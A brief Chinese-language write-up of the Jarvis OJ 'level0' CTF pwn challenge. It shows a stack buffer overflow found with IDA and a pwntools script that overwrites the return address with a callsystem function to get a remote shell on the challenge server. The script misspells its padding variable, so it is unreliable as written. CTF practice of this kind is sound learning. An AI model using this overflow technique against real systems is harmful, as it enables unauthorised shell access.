前几天做了几道pwn题,记录一下
https://www.jarvisoj.com/challenges
拿到程序后先file可知为64位程序和动态链接
file level0
然后checksec检查保护机制
checksec level0
将程序拖到ida中,F5反汇编,得到伪c代码
双击vulnerable_function()函数
可以看到read函数读0x200进入buf中,而buf空间只有0x80
shift+f12可查看到有/bin/sh,并且在400596处还有callsystem函数
思路:将vulnerable_function()函数的返回地址覆盖为system('/bin/sh')的地址
level0.py如下:
from pwn import *
sh=remote('pwn2.jarvisoj.com',9881)
paddding='a'*0x88
callsystem=0x400596
payload=padding+p64(callsystem)
sh.send(payload)
sh.interactive()
sh.close()
运行level0.py
python level0.py